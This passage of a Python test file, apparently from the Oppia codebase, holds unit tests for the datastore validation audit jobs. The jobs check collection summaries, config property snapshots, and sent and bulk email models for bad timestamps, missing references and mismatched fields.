def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id collection-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of CollectionCommitLogEntryModel\', '
'[u\'Entity id collection-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = (
feconf.POST_COMMIT_STATUS_PUBLIC)
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'%s but post_commit_is_private is True\']]'
) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PUBLIC),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = (
feconf.POST_COMMIT_STATUS_PRIVATE)
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'%s but post_commit_is_private is False\']]'
) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PRIVATE),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_collection_node'
}, {
'cmd': 'delete_collection_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_collection_node check of '
'CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_collection_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'exploration_id, The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_collection_node check of CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_collection_node\'} '
'failed with error: The following required attributes '
'are missing: exploration_id"]]'),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionSummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
contributor_email = 'user@contributor.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.signup(contributor_email, 'contributor')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
self.contributor_id = self.get_user_id_from_email(contributor_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
language_codes = ['ar', 'en', 'en']
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection.tags = ['math', 'art']
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.assign_role_for_collection(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
collection_services.update_collection(
self.contributor_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
rights_manager.assign_role_for_collection(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = (
collection_models.CollectionSummaryModel.get_by_id('0'))
self.model_instance_0.put()
self.model_instance_1 = (
collection_models.CollectionSummaryModel.get_by_id('1'))
self.model_instance_2 = (
collection_models.CollectionSummaryModel.get_by_id('2'))
self.job_class = (
prod_validation_jobs_one_off.CollectionSummaryModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_collection(self.owner, '0')
collection_services.update_collection(
self.owner_id, '1', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
collection_services.delete_collection(self.owner_id, '1')
collection_services.delete_collection(self.owner_id, '2')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_model = collection_models.CollectionModel.get_by_id('0')
collection_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
self.model_instance_0.collection_model_last_updated = (
collection_model.last_updated)
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field collection_ids having '
'value 0, expect model CollectionModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_collection(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_contributor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
expected_output = [
(
u'[u\'failed validation check for contributor_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field contributor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.contributor_id, self.contributor_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of CollectionSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] do '
'not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]'
) % (sorted_contributor_ids[0], sorted_contributor_ids[1]),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_node_count(self):
self.model_instance_0.node_count = 10
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for node count check '
'of CollectionSummaryModel\', '
'[u"Entity id 0: Node count: 10 does not match the number '
'of nodes in collection_contents dict: [{u\'exploration_id\': '
'u\'0\'}, {u\'exploration_id\': u\'1\'}]"]]'
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_ratings(self):
self.model_instance_0.ratings = {'1': 0, '2': 1}
self.model_instance_0.put()
self.model_instance_1.ratings = {}
self.model_instance_1.put()
expected_output = [(
u'[u\'failed validation check for ratings check of '
'CollectionSummaryModel\', '
'[u"Entity id 0: Expected ratings for the entity to be empty '
'but received {u\'1\': 0, u\'2\': 1}"]]'
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding collection title field: New title\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_rights_related_property(self):
self.model_instance_0.status = 'public'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for status field check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: status field in entity: public does not '
'match corresponding collection rights status field: '
'private\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertyModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertyModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.model_instance = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.model_instance.commit(feconf.SYSTEM_COMMITTER_ID, [])
self.csrf_model_instance = config_models.ConfigPropertyModel.get_by_id(
'oppia_csrf_secret')
self.job_class = (
prod_validation_jobs_one_off.ConfigPropertyModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ConfigPropertyModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.commit(self.admin_id, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertyModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated
),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete(self.admin_id, '', [{}])
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertyModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'config_model-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ConfigPropertyModel\', '
'[u"Entity id config_model: based on field '
'snapshot_metadata_ids having '
'value config_model-1, expect model '
'ConfigPropertySnapshotMetadataModel '
'with id config_model-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'config_model-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ConfigPropertyModel\', '
'[u"Entity id config_model: based on field '
'snapshot_content_ids having '
'value config_model-1, expect model '
'ConfigPropertySnapshotContentModel '
'with id config_model-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertySnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.config_model = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.config_model.commit(self.admin_id, [])
user_models.UserSettingsModel(
id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
self.model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'config_model-1'))
self.csrf_model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'oppia_csrf_secret-1'))
self.job_class = (
prod_validation_jobs_one_off
.ConfigPropertySnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
self.config_model.commit(self.admin_id, [])
expected_output = [
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_config_property_model_failure(self):
self.config_model.delete(self.admin_id, '', [])
expected_output = [
(
u'[u\'failed validation check for config_property_ids '
'field check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field '
'config_property_ids having value config_model, '
'expect model ConfigPropertyModel with '
'id config_model but it doesn\'t exist", '
'u"Entity id config_model-2: based on field '
'config_property_ids having value config_model, expect model '
'ConfigPropertyModel with id config_model but it doesn\'t '
'exist"]]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.admin_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field committer_ids '
'having value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.admin_id, self.admin_id),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_config_property_model_version_in_model_id(self):
model_with_invalid_version_in_id = (
config_models.ConfigPropertySnapshotMetadataModel(
id='config_model-3', committer_id=self.admin_id,
commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for config property model '
'version check of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id config_model-3: ConfigProperty model '
'corresponding to id config_model has a version 1 '
'which is less than the version 3 in '
'snapshot metadata model id\']]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance.commit_cmds = [{
'cmd': 'change_property_value',
'invalid_attribute': 'invalid'
}]
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_property_value check of '
'ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: Commit command domain '
'validation for command: {u\'cmd\': '
'u\'change_property_value\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'new_value, The following extra attributes are present: '
'invalid_attribute"]]'
), u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertySnapshotContentModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.config_model = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.config_model.commit(self.admin_id, [])
user_models.UserSettingsModel(
id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
self.model_instance = (
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'config_model-1'))
self.csrf_model_instance = (
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'oppia_csrf_secret-1'))
self.job_class = (
prod_validation_jobs_one_off
.ConfigPropertySnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
self.config_model.commit(self.admin_id, [])
expected_output = [
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertySnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertySnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_config_property_model_failure(self):
self.config_model.delete(self.admin_id, '', [])
expected_output = [
(
u'[u\'failed validation check for config_property_ids '
'field check of ConfigPropertySnapshotContentModel\', '
'[u"Entity id config_model-1: based on field '
'config_property_ids having value config_model, '
'expect model ConfigPropertyModel with '
'id config_model but it doesn\'t exist", '
'u"Entity id config_model-2: based on field '
'config_property_ids having value config_model, expect model '
'ConfigPropertyModel with id config_model but it '
'doesn\'t exist"]]'
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_config_property_model_version_in_model_id(self):
model_with_invalid_version_in_id = (
config_models.ConfigPropertySnapshotContentModel(
id='config_model-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for config property model '
'version check of ConfigPropertySnapshotContentModel\', '
'[u\'Entity id config_model-3: ConfigProperty model '
'corresponding to id config_model has a version 1 '
'which is less than the version 3 in snapshot '
'content model id\']]'
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class SentEmailModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(SentEmailModelValidatorTests, self).setUp()
def mock_generate_hash(
unused_cls, unused_recipient_id, unused_email_subject,
unused_email_body):
return 'Email Hash'
self.sender_email = 'sender@email.com'
self.sender_id = 'sender'
self.sender_model = user_models.UserSettingsModel(
id=self.sender_id, email=self.sender_email)
self.sender_model.put()
self.recipient_email = 'recipient@email.com'
self.recipient_id = 'recipient'
self.recipient_model = user_models.UserSettingsModel(
id=self.recipient_id, email=self.recipient_email)
self.recipient_model.put()
with self.swap(
email_models.SentEmailModel, '_generate_hash',
types.MethodType(mock_generate_hash, email_models.SentEmailModel)):
email_models.SentEmailModel.create(
self.recipient_id, self.recipient_email, self.sender_id,
self.sender_email, feconf.EMAIL_INTENT_SIGNUP,
'Email Subject', 'Email Body', datetime.datetime.utcnow())
self.model_instance = email_models.SentEmailModel.get_by_hash(
'Email Hash')[0]
self.job_class = (
prod_validation_jobs_one_off.SentEmailModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated SentEmailModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of SentEmailModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() - datetime.timedelta(hours=20))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for current time check of '
'SentEmailModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_sender_id(self):
self.sender_model.delete()
expected_output = [(
u'[u\'failed validation check for sender_id field check of '
'SentEmailModel\', '
'[u"Entity id %s: based on field sender_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.sender_id, self.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_recipient_id(self):
self.recipient_model.delete()
expected_output = [(
u'[u\'failed validation check for recipient_id field check of '
'SentEmailModel\', '
'[u"Entity id %s: based on field recipient_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.recipient_id, self.recipient_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_sender_email(self):
self.sender_model.email = 'invalid@email.com'
self.sender_model.put()
expected_output = [(
u'[u\'failed validation check for sender email check of '
'SentEmailModel\', '
'[u\'Entity id %s: Sender email %s in entity does not match with '
'email %s of user obtained through sender id %s\']]') % (
self.model_instance.id, self.model_instance.sender_email,
self.sender_model.email, self.model_instance.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_recipient_email(self):
self.recipient_model.email = 'invalid@email.com'
self.recipient_model.put()
expected_output = [(
u'[u\'failed validation check for recipient email check of '
'SentEmailModel\', '
'[u\'Entity id %s: Recipient email %s in entity does not match '
'with email %s of user obtained through recipient id %s\']]') % (
self.model_instance.id, self.model_instance.recipient_email,
self.recipient_model.email, self.model_instance.recipient_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_sent_datetime_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for sent datetime check of '
'SentEmailModel\', '
'[u\'Entity id %s: The sent_datetime field has a value %s '
'which is greater than the time when the job was run\']]') % (
self.model_instance.id, self.model_instance.sent_datetime)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_instance_with_invalid_id = email_models.SentEmailModel(
id='invalid', recipient_id=self.recipient_id,
recipient_email=self.recipient_email, sender_id=self.sender_id,
sender_email=self.sender_email, intent=feconf.EMAIL_INTENT_SIGNUP,
subject='Email Subject', html_body='Email Body',
sent_datetime=datetime.datetime.utcnow())
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated SentEmailModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'SentEmailModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % 'invalid']
run_job_and_check_output(self, expected_output, sort=True)
class BulkEmailModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(BulkEmailModelValidatorTests, self).setUp()
self.sender_email = 'sender@email.com'
self.sender_id = 'sender'
self.sender_model = user_models.UserSettingsModel(
id=self.sender_id, email=self.sender_email)
self.sender_model.put()
self.recipient_ids = ['recipient1', 'recipient2']
self.recipient_model_1 = user_models.UserSettingsModel(
id=self.recipient_ids[0], email='recipient1@email.com')
self.recipient_model_1.put()
self.recipient_model_2 = user_models.UserSettingsModel(
id=self.recipient_ids[1], email='recipient2@email.com')
self.recipient_model_2.put()
self.model_id = 'bulkemailid1'
email_models.BulkEmailModel.create(
self.model_id, self.recipient_ids, self.sender_id,
self.sender_email, feconf.BULK_EMAIL_INTENT_MARKETING,
'Email Subject', 'Email Body', datetime.datetime.utcnow())
self.model_instance = email_models.BulkEmailModel.get_by_id(
self.model_id)
self.job_class = (
prod_validation_jobs_one_off.BulkEmailModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated BulkEmailModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of BulkEmailModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() - datetime.timedelta(hours=20))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for current time check of '
'BulkEmailModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_sender_id(self):
self.sender_model.delete()
expected_output = [(
u'[u\'failed validation check for sender_id field check of '
'BulkEmailModel\', '
'[u"Entity id %s: based on field sender_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.sender_id, self.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_recipient_id(self):
self.recipient_model_1.delete()
expected_output = [(
u'[u\'failed validation check for recipient_id field check of '
'BulkEmailModel\', '
'[u"Entity id %s: based on field recipient_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.recipient_ids[0],
self.recipient_ids[0])]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_sender_email(self):
self.sender_model.email = 'invalid@email.com'
self.sender_model.put()
expected_output = [(
u'[u\'failed validation check for sender email check of '
'BulkEmailModel\', '
'[u\'Entity id %s: Sender email %s in entity does not match with '
'email %s of user obtained through sender id %s\']]') % (
self.model_instance.id, self.model_instance.sender_email,
self.sender_model.email, self.model_instance.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_sent_datetime_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for sent datetime check of '
'BulkEmailModel\', '
'[u\'Entity id %s: The sent_datetime field has a value %s '
'which is greater than the time when the job was run\']]') % (
self.model_instance.id, self.model_instance.sent_datetime)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
